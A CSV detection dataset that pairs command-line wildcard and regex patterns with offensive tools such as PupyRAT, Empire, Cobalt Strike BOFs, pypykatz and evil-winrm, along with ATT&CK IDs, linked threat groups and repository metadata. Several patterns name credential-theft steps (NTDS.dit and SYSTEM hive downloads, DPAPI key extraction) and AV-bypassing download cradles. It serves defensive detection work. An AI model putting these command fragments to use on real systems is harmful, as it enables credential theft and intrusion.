"* domcachedump.py*",".{0,1000}\sdomcachedump\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","916"
"* domcachedump.py*",".{0,1000}\sdomcachedump\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","917"
"* domcon-brute.nse*",".{0,1000}\sdomcon\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","918"
"* domcon-cmd.nse*",".{0,1000}\sdomcon\-cmd\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","919"
"* dome.py*",".{0,1000}\sdome\.py.{0,1000}","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Reconnaissance","https://github.com/v4d1/Dome","1","0","N/A","N/A","5","6","531","74","2024-02-07T09:12:17Z","2022-02-20T15:09:40Z","920"
"* domino-enum-users.nse*",".{0,1000}\sdomino\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","921"
"* -DoNotPersistImmediately *",".{0,1000}\s\-DoNotPersistImmediately\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Persistence.psm1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","923"
"* --dont-enumerate-acls *",".{0,1000}\s\-\-dont\-enumerate\-acls\s.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","N/A","9","8","712","80","2025-01-21T22:34:00Z","2021-05-31T19:46:57Z","925"
"* --dont-enumerate-acls * -e *",".{0,1000}\s\-\-dont\-enumerate\-acls\s.{0,1000}\s\-e\s.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","N/A","9","8","712","80","2025-01-21T22:34:00Z","2021-05-31T19:46:57Z","926"
"* --dont-spoof *",".{0,1000}\s\-\-dont\-spoof\s.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","N/A","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","927"
"* --dont-spoof-for *",".{0,1000}\s\-\-dont\-spoof\-for\s.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","N/A","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","928"
"* --donut --rehash n --silent -o /tmp/*",".{0,1000}\s\-\-donut\s\-\-rehash\sn\s\-\-silent\s\-o\s\/tmp\/.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","929"
"* donut.c *",".{0,1000}\sdonut\.c\s.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","930"
"* donut.exe *",".{0,1000}\sdonut\.exe\s.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","931"
"* donut.o *",".{0,1000}\sdonut\.o\s.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","932"
"* --donut-cmdline *",".{0,1000}\s\-\-donut\-cmdline\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","933"
"* --dotnetassembly * --amsi*",".{0,1000}\s\-\-dotnetassembly\s.{0,1000}\s\-\-amsi.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","N/A","10","10","657","130","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z","934"
"* --dotnetassembly * --appdomain *",".{0,1000}\s\-\-dotnetassembly\s.{0,1000}\s\-\-appdomain\s.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","N/A","10","10","657","130","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z","935"
"* --dotnetassembly * --assemblyargs *",".{0,1000}\s\-\-dotnetassembly\s.{0,1000}\s\-\-assemblyargs\s.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","N/A","10","10","657","130","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z","936"
"* --dotnetassembly * --mailslot*",".{0,1000}\s\-\-dotnetassembly\s.{0,1000}\s\-\-mailslot.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","N/A","10","10","657","130","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z","937"
"* --dotnetassembly * --pipe *",".{0,1000}\s\-\-dotnetassembly\s.{0,1000}\s\-\-pipe\s.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","N/A","10","10","657","130","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z","938"
"* --dotnetver * --payload * --sandbox *",".{0,1000}\s\-\-dotnetver\s.{0,1000}\s\-\-payload\s.{0,1000}\s\-\-sandbox\s.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","939"
"* -Downgrade False -Restore False -Impersonate True * -challange *",".{0,1000}\s\-Downgrade\sFalse\s\-Restore\sFalse\s\-Impersonate\sTrue\s.{0,1000}\s\-challange\s.{0,1000}","offensive_tool_keyword","Internal-Monologue","Internal Monologue Attack: Retrieving NTLM Hashes without Touching LSASS","T1003 - T1051 - T1574 - T1110 - T1547","TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/eladshamir/Internal-Monologue","1","0","N/A","N/A","N/A","10","1512","240","2018-10-11T12:13:08Z","2017-12-09T05:59:01Z","940"
"* download *\NTDS\NTDS.dit*",".{0,1000}\sdownload\s.{0,1000}\\NTDS\\NTDS\.dit.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","Turla","Exploitation tool","https://github.com/Hackplayers/evil-winrm","1","0","N/A","N/A","10","10","4804","626","2024-12-02T08:52:41Z","2019-05-28T10:53:00Z","941"
"* download *\Windows\System32\config\SYSTEM*",".{0,1000}\sdownload\s.{0,1000}\\Windows\\System32\\config\\SYSTEM.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","Turla","Exploitation tool","https://github.com/Hackplayers/evil-winrm","1","0","N/A","N/A","N/A","10","4804","626","2024-12-02T08:52:41Z","2019-05-28T10:53:00Z","942"
"* Download_Cradles.hta*",".{0,1000}\sDownload_Cradles\.hta.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","943"
"* Download_Cradles.ps1*",".{0,1000}\sDownload_Cradles\.ps1.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","944"
"* dpap-brute.nse*",".{0,1000}\sdpap\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","947"
"* dpapi blob *.json *.dat*",".{0,1000}\sdpapi\sblob\s.{0,1000}\.json\s.{0,1000}\.dat.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","948"
"* dpapi credential *.json cred*",".{0,1000}\sdpapi\scredential\s.{0,1000}\.json\scred.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","949"
"* dpapi masterkey /root/*",".{0,1000}\sdpapi\smasterkey\s\/root\/.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","950"
"* dpapi minidump *.dmp*",".{0,1000}\sdpapi\sminidump\s.{0,1000}\.dmp.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","951"
"* dpapi prekey nt *S-1-5-21*",".{0,1000}\sdpapi\sprekey\snt\s.{0,1000}S\-1\-5\-21.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","952"
"* dpapi prekey password *",".{0,1000}\sdpapi\sprekey\spassword\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","953"
"* dpapi prekey registry *.reg*",".{0,1000}\sdpapi\sprekey\sregistry\s.{0,1000}\.reg.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","954"
"* dpapi securestring *.dat*",".{0,1000}\sdpapi\ssecurestring\s.{0,1000}\.dat.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","955"
"* Dpapi.ps1*",".{0,1000}\sDpapi\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","956"
